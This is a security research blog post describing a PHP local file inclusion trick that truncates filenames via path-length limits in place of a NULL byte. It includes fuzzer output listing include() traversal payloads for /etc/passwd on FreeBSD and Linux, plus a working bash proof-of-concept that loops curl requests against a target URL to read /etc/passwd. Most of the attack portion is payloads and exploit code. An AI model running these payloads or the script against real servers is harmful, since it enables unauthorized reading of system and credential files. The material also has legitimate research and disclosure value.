Another alternative for NULL byte

Undoubtedly, many of you remember that Raz0r brought up the question of alternative for NULL byte about a year ago and the ush group conducted corresponding investigations devoted to this problem [1, 2, and 3]. By the way, yours truly added a new method to the MaxPatrol knowledge base at the same time and supplemented the method implementation with own elaborations [4].

So, why do I touch this topic again? The deal is that the mentioned method was based on the idea to zap the file end (extension), which will in turn get into include. It is possible, because PHP uses path normalization and fails to access a file exceeding the MAX_PATH. Well, why can’t we use the same PHP restrictions (the MAX_PATH value) and try to fill the length of the file name from the beginning of the file? This idea occurred to a young man (Yuri Goltsev), who was asked a relevant question on the job interview. And it must work indeed!

I wrote a simple fuzzer to check another alternative for NULL byte [5]. Here is the result of its operation:

~ # uname -a
FreeBSD web.local 8.0-RELEASE-p2 FreeBSD 8.0-RELEASE-p2 #0: Wed Feb 10
 09:09:51 MSK 2010     root@pt.local:/usr/obj/usr/src/sys/LOCAL  i386
~ # php -v
PHP 5.2.12 with Suhosin-Patch 0.9.7 (cli) (built: Feb 17 2010 01:05:37)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2009 Zend Technologies

include(qq/n[..960..]n/../../../../../../../../../etc/passwd.txt)
include_once(qq/n[..960..]n/../../../../../../../../../etc/passwd.txt)
include(q/n[..961..]n/../../../../../../../../../etc/passwd.txt)
include_once(q/n[..961..]n/../../../../../../../../../etc/passwd.txt)
include(n[..963..]n/../../../../../../../../../etc/passwd.txt)
include_once(n[..963..]n/../../../../../../../../../etc/passwd.txt)
include(qq/n[..971..]n/../../../../../../../../../etc/passwd.txt)
include_once(qq/n[..971..]n/../../../../../../../../../etc/passwd.txt)
include(q/n[..972..]n/../../../../../../../../../etc/passwd.txt)
include_once(q/n[..972..]n/../../../../../../../../../etc/passwd.txt)
include(n[..974..]n/../../../../../../../../../etc/passwd.txt)
include_once(n[..974..]n/../../../../../../../../../etc/passwd.txt)


~ # uname -a
Linux bt 2.6.21.5 #4 SMP Thu Apr 10 04:23:56 GMT 2008 i686 Intel(R)
 Pentium(R) M processor 1.86GHz GenuineIntel GNU/Linux
~ # php -v
PHP 5.2.4 (cli) (built: Sep 11 2007 21:55:04)
Copyright (c) 1997-2007 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies


include(qq/n[..4041..]n/../../../../../../../../../etc/passwd.txt)
include_once(qq/n[..4041..]n/../../../../../../../../../etc/passwd.txt)
include(q/n[..4042..]n/../../../../../../../../../etc/passwd.txt)
include_once(q/n[..4042..]n/../../../../../../../../../etc/passwd.txt)
include(n[..4044..]n/../../../../../../../../../etc/passwd.txt)
include_once(n[..4044..]n/../../../../../../../../../etc/passwd.txt)
include(qq/n[..4048..]n/../../../../../../../../../etc/passwd.txt)
include_once(qq/n[..4048..]n/../../../../../../../../../etc/passwd.txt)
include(q/n[..4049..]n/../../../../../../../../../etc/passwd.txt)
include_once(q/n[..4049..]n/../../../../../../../../../etc/passwd.txt)
include(n[..4051..]n/../../../../../../../../../etc/passwd.txt)
include_once(n[..4051..]n/../../../../../../../../../etc/passwd.txt)

It should be mentioned, that the data given above is totally valid for the functions require() and require_once() similarly to the functions include() and include_once().

An example of local file including exploitation using the discussed method (proof of concept) is given below:

#!/usr/local/bin/bash  
file='/etc/passwd'   
str=`php -r "echo str_repeat('/..', 300);"`  
for ((i=1; i <= 100 ; i++)) do  
pre=$pre'n'  
URL="$1$pre$str$file"  
response=`curl -kis $URL | egrep "^root" | wc -l`  
if [ $response = 1 ]; then  
echo "Found: $URL";  
fi  
done   

bash poc.sh "http://192.168.0.51/test.php?file="

As one can notice – it works!